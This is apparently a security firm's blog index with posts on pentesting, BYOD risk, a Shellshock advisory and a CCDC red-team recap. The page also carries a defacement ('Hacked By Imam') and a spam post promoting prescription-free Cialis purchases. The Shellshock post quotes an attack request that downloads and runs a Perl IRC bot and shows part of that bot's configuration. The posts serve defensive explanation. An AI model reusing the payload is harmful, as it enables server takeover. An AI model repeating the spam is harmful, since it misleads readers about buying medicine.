CA Insights

Home » CA Insights

Hacked By Imam

in General by mharrigan Leave a comment


Hacked By Imam


The Best Online Pharmacy. Buy Cialis Without Prescription –

in General by mharrigan Leave a comment

Why buy cialis on the internet is really beneficial for you?

So you’ve decided to order cialis and do not know where to start? We can give you some advice. First, ask your doctor for advice in order to properly determine the dosage, when you do that, you need to decide for yourself exactly where you will be buying the drug. You can buy cialis online, or you can just buy it at the pharmacy. Buy cialis online has a number of advantages, one of which is price. The cost of the Internet will always be lower than in stores, and when combined with the free shipping, it will be the best choice. Besides the price there are a number of advantages over conventional pharmacies, one of which is anonymity. Also, you can always check the online store on reliability, read reviews about it and the opinion of other buyers. Read more.

Why you should consider rotating Security Assessors –

in General by mharrigan Leave a comment

In order to protect valuable corporate assets and prove due diligence, security assessments and validation of controls are required on a regular basis.  To adhere to regulatory compliance, these tasks are generally scheduled in advance and involve the repeated use of a single person or group of professional penetration testers.  In this established routine lies a potential problem.

Penetration Testing is an art based on well-trained and highly creative individuals.  Their most important task is to replicate attack strategies that many adversarial groups would launch against the corporate assets, defined as Physical Infrastructure or Intellectual Property.  Threat Actors use widely different methods of attack plans, with an even more diverse range of tools, making it impossible to develop a “one size fits all” defense plan.

One threat actor might emphasize the attacks on Web Portals, while another might be more biased towards Social Engineering, all very creative and different in design and strategy.

This brings me to my primary point. It is highly unlikely that a single person or group can know all things about security and infrastructure.  Therefore, corporations should consider revolving through a set of known trusted professionals, be it with the same organization or sourced from different groups.  This will allow for a more diverse approach to testing and assessing the security controls of the corporate infrastructure.  Adopting this approach provides more creativity and the additional experience brings about the possibility of greater and more extensible security.

Adopting portions of the NIST “Guide to Cyber Threat Information Sharing (Draft)”, would allow all groups to effectively and efficiently share notes from the previous engagements, which leveraged properly, would provide a far more secure platform and provide additional assurances to all parties involved.

Leveraging Social Networks and BYOD for Reverse Social Engineering Attacks on Corporate Networks

in General by mharrigan Leave a comment

The growth of social media, coupled with the increasing adoption of BYOD (Bring Your Own Device) present new challenges for network security. This paper provides proof of concept on how a carefully crafted Reverse Social Engineering (RSE) attack, using social media platforms such as Facebook or LinkedIn, can compromise mobile devices used by professionals. As a result of BYOD, these compromised devices are readily given network access. Access is likely just as high as the user’s normal access using a company provided workstation that stays in the environment at all times. This allows an attacker to establish a foothold within the network to launch further attacks. We will also examine the best practices to defend against this growing threat.

Prepared by:
Patrick Kelley
Jared Haviland

Read More

“Return to Sender” – Hands Free WiFi Exploitation.

in General by mharrigan Leave a comment

Reviewing current digital security attack vectors this evening, I’m curious as to why we aren’t see more “attacks by courier”. Many companies employ 3rd Party Courier Services these days. These are groups that are generally considered trustworthy and rarely questioned.

If you were to package a Raspberry Pi or Wifi Pineapple with an extended battery pack, you could have it delivered by courier and sit inside a corporation, crack WEP/WPA2 keys and sniff out data for quite some time. If it is sent to a non-existent party within the organization, it would simply be “returned to sender”. Of course, after it took several days moving through the organization looking for the fake delivery point.

Partnered with a cellular connection, it could transmit real-time using a netcat/cryptcat, tor-based reverse shell for calling home until it simply ran out of power. As a device could be developed for less than $40 with wireless capabilities, I believe I’ll be reading more about this in the near future.

Shellshock! Important Vulnerability Alert CVE-2014-6271

in General by mharrigan Leave a comment

What is Shellshock? 

ShellShock Detection in Dashboard

Incident Monitor – PacketSled

To understand what it is, we need to establish was “Bash” is.  Bash is a *nix shell or in other words, an interpreter that allows you to execute various commands on Unix and Linux systems, typically by connecting over SSH. However, it can also operate as a interpreter for CGI scripts on a web server such as we’d typically see running on Apache or NGINX.  Apache and NGINX are typically used for hosting web applications, which are commonly allowed for anonymous (non-authenticated) users.

Sound pretty powerful?  Well, it is!

With proper control of the process, this isn’t a significant problem.  However, when processes aren’t handled securely, the opportunity for bad things can arise.  Technically, the issue with Bash is the following:

GNU Bash versions through 4.3 processes trailing strings after function definitions in the values of environment variables, allowing remote attackers to execute arbitrary malicious, as demonstrated by vectors involving the ForceCommand feature in OpenSSH, the mod_cgi and mod_cgid modules in the Apache HTTP Server, similar NGINX functions and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

That definition can cause many to “glaze over”, which is a major problem, considering the severity of the issue.

Breaking it down, a typical “web” request is crafted similar to the following:

GET //cgibin/bash HTTP/1.0404 464” “() { :;}; /bin/bash c \wget O /tmp/.apache;killall 9 perl;perl /tmp/.apache;rm rf /tmp/.apache\“”

In this request, we can see where the attacker is attempting to transfer a malicious file, using wget, into the server environment.  A snippet of that code is shown below:

# Legend Bot [2011] DO NOT ****** SHARE! #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# Commands: #
# !legend @system #
# !legend @rootable #
# !legend @cleanlogs #
# !legend @socks5 #
# !legend @nmap <ip> <beginport> <endport> #
# !legend @back <ip><port> #
# !legend @sqlflood <host> <time> #
# !legend @udp <host> <packet size> <time> #
# !legend @udp2 <host> <packet size> <time> <port> #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #

my $sshuser = $argv[0];
my $sshpass = $argv[1];
my $sshhost = $argv[2];
my $hidden = ‘core’;
my $linas_max=’4′;
my $sleep=’5′;
my @admins=(“god”,”ARZ”,”Zax”);
my @hostauth=(“”);
my @channels=(“#apache”);
my $nick= ‘BASH’;
my $ircname =’B’;
my $realname = ‘$uname’;
my $server=’’;
my $port=’7777′;

The goal of this payload is to take control of the server and provide a shell back to the controller.  This is obviously not in the best interest of the server’s owner.  Fortunately, patches were released fairly quickly to mitigate the attacks, but they have not been entirely effective. Some of the early patches released for Bash and the impacted operating systems weren’t complete. Knowing this, if you started applying patches before Saturday, September 27th, you will need to apply new patches distributed by your vendor.

So, exactly what has changed in the last few days?

CVE-2014-6271 is showing as being exploited through worms and several snippets of proof of concept code have become available for exploiting services outside of HTTP/HTTPS.  In fact, four new CVEs have been created related to the Bash vulnerabilities.

The first two new vulnerabilities are memory corruption flaws in the Bash parser being tracked as CVE-2014-7186 and CVE-2014-7187.  These will need to used in targeted campaigns, which we are not seeing a large amount of occurrences.

The most dangerous and concerning are actually the ones listed below:

  • CVE-2014-6277 – Permits remote code execution and requires a high level of expertise. It has a CVSS score of 10.0
  • CVE-2014-6278 – More severe as it allows remote code execution and doesn’t require a high level of expertise. It has a CVSS score of 10.0


That is a pretty grim picture I’ve painted. Luckily, vendors have been quick to release new patch releases that have proven to mitigate the attacks.  That being said, Critical Assets recommends that you execute the following commands in your Linux environments as quickly as possible.

Ubuntu/Debian: apt-get update && apt-get upgrade
Redhat/Centos: yum update

If you experience difficulties in applying the patches or determining if your environment is at risk, we are always here to assist you in any way possible.

The Biggest Threat To Corporations Might Be In Their Employee’s Pocket.

in General by mharrigan Leave a comment

To many of our readers, this will seem elementary, however, as I continually mention to non-technical people, it is incredibly important that corporations use some sort Mobile Device Management or Content Control (Filtering/DLP) for their mobile initiatives. Attacks against this infrastructure are trivial. Within 10 minutes this morning, I was able to stage and compromise two prominent mobile environments, collecting corporate email, contacts, stored credentials and geographical location, using only browser and system vulnerabilities.

It is important to understand that corporations are embracing multiple operating systems and devices in hopes of reducing cost and the associated overhead of providing devices for each employee. This model also provides freedom to employees to decide which device and features they choose to adopt, leading to a reduction in deployment of redundant devices. The drawback to this concept is in the heterogeneity of the mobile environment in which patching can be sparse, inconsistent and in some situations, altogether missing. Options exist to assist in the management of these environments. However, our findings show a far greater increase in operating systems deployed in comparison to the management options leveraged.

Accepting the increased adoption of BYOD (Bring Your Own Device) as empirical fact, we found that most corporations were spreading their IT managers too thin, forcing them to make subjective decisions regarding what devices would be supported by the IT department. These judgements are generally determined without a proven Mobile Device Policy in place.

Due to the presence of informal training and lack of proper maintenance policies, threats against the enterprise increase. Additionally, relying on IT to solely manage the mobile workforce to keep inappropriate security workarounds could be considered irresponsible in many cases, especially when no mitigating controls exist. To that end, our research shows that in over 30% of the corporate environments, Information Technology does not provide any support. Users are simply left to their own devices (pun intended).

Take time to understand the risks of allowing employees to bring their own devices onto your network. Check how that applies to your regulatory compliance and what can be done. If you don’t know where to start, reach out to myself or your professional community.

Critical Assets
Research and Development

Security:  Security doesn’t have to last forever; just longer than everything else that might notice it’s gone.

in General by mharrigan Leave a comment

Midsized companies are often starved for capital to renew their corporate security controls. Investments typically focus on items that can increase the profits: Business Intelligence, automation systems, and the like. Certainly, operational and IT infrastructure spending does drain the bottom line, but if a midsized firm doesn’t make the right investments when they are necessary, the layers of protection used to protect the profits, erodes.

With the innovations associated with advances in circuits and software, it is now possible to make a Web server that fits on a fingertip for $1. When embedded in everyday objects, these small computers can send and receive information via the Internet so that a coffeemaker can turn on when a person gets out of bed. Unfortunately, these items can also be used to compromise your network. These devices generally aren’t noticed on networks as they are small and most corporate enterprises lack the technology to see rogue physically connected devices. Servers such as these collect intellectual property and transmit it to cyber criminals, without ever raising an eyebrow. Welcome to the dark side of the “Internet of Things”.

The corporate network environment is quickly evolving, wiping clear all physical and logical boundaries that used to protect the most important of data. Unfortunately, the budgets are going away as well.

You need the security and peace of mind of knowing your most important assets are secure.

This is where Critical Assets comes in.

In addition to our standalone and managed security services, Critical Assets provides a “Virtual Security Team” that makes our security engineers available to your company on a regular schedule throughout the month, just as if you budgeted, built, and hired your own team.

The Virtual Security Team can:

Design and rollout a security program for your company.
Fill critical “right now” security needs like technical architecture, configuration, and implementation of security devices.
Remediate issues with your existing security strategy.
Prepare you for an upcoming audit.
Perform ongoing security assessment and penetration testing of key assets.

And The Winner is…Red Team. Experiences from NCCDC

in General by mharrigan Leave a comment

I had the privilege of participating as a member of the Red team in this year’s National Collegiate Cyber Defense Competition (CCDC) in San Antonio, TX. This is the 9th year for CCDC and if you are not familiar, CCDC is a competition where university students form teams and compete with other schools for points by defending their assigned company. They do this by managing and protecting their company’s assets while meeting business needs and maintaining service level agreements (SLA).  They are essentially Blue teams and are addressed as such. Enter the Red team. The Red team is a group of penetration testing professionals whose job it is to infiltrate these teams’ assets and in general be the disruptive force within the competition. Successful Red Team actions result in Blue Team point deductions. Activities such as user and root level access, recovery and publishing of user ids and passwords, PII, or credit card information, etc. all result in deductions of varied value. Red team activities that affect SLAs will also adversely affect Blue team scores.

I know some of you may be thinking that this sounds a lot like a capture the flag (CTF) event but there are some major differences:

  • The Blue teams are not allowed to go offensive.
  • The Blue teams receive injects, requests made by the business that the Blue Team must perform such as standing up new infrastructure and services.
  • Blue teams can write incident reports for Red team activities they detect and reduce the penalty they incurred for the incident.

Raphael Mudge  did a wonderful recap of the event from the Red Team perspective and Dave Cowen , the Red team captain, provided a message of intervention to the competitors.

Now after the competition I had a chance to converse with a few of the competitors and some remarked that the competition is unfair or unrealistic. To this I respond, it is unfair but as my parents used to tell me, “life is not fair”. However, you will never get a more realistic event except of course in the “real world”.  Now, the “real world” is not always as fast paced but the competition is only two days and an accelerated timeline is unavoidable, much like your typical penetration test where you expected to portray an actor who is threat representative in only a small fraction of the length of an actual threat’s engagement. Real threats are often working with a much larger window of opportunity.  Real threats may often know more about your company’s network than you on your first day on the job and will probably be around after your last. For this reason, concessions must be made to produce an event that more closely approximates reality. The key to being realistic is patience and representing the threat actors who exist. This is something that has been integrated into the Red team strategy:

Day 1:

  1. Establish Foothold
  2. Conceal Presence
  3. Conduct Surveillance

Day 2:

  1. Deface, Expose, Destroy. 
  2. Wait
  3. Repeat

Day 1 is dedicated to patience and some real world threats will stop with Day 1 activities never showing their hand, conducting data exfiltration until the gravy train is stopped which can be for quite a long ride. Day 2 activities resemble the tactics of threat actors who wish to attack the reputation of the organization they are targeting or have been presented the opportunity to exploit without need for justification. I believe the above strategy represents a majority of the threat space most companies must contend with on a daily basis.

Another specific competitor complaint was about the use of older technology and I can relate to this complaint as I distinctly recall after leaving the university believing that every company would be using bleeding edge technology. This is just not the case. Every client I have worked with has some stable of “legacy” systems that have not been refreshed due to the function of some delicate application or business dependence. I have even seen slow adoption of desktop operating system upgrades for fear of how it would affect employee productivity. So yes, most companies you will encounter will have some dinosaurs on their network.

I do congratulate all the competitors who participated in CCDC. This is a step in improving the defensive capabilities in industry through an educational competition. Of course, congratulations to Rochester Institute of Technology, the 2013 National CCDC champions. Last but not least, congratulations to the Red team. I have to say that the individuals who composed the Red team are the best group of gentlemen hackers I’ve had the pleasure of serving with.  They are some real industry heavy hitters and I am honored to have been in the same room with them. Maybe next year the Red team will realize Dave’s dream of an “all red” board.

Improving Your Online Personal Security

in Compromise, Compromises, Data compromises, encryption, Ethics, General, Hackers, Hacking, Information Security Industry, privacy, Security by mharrigan Leave a comment


Page 1 of 41234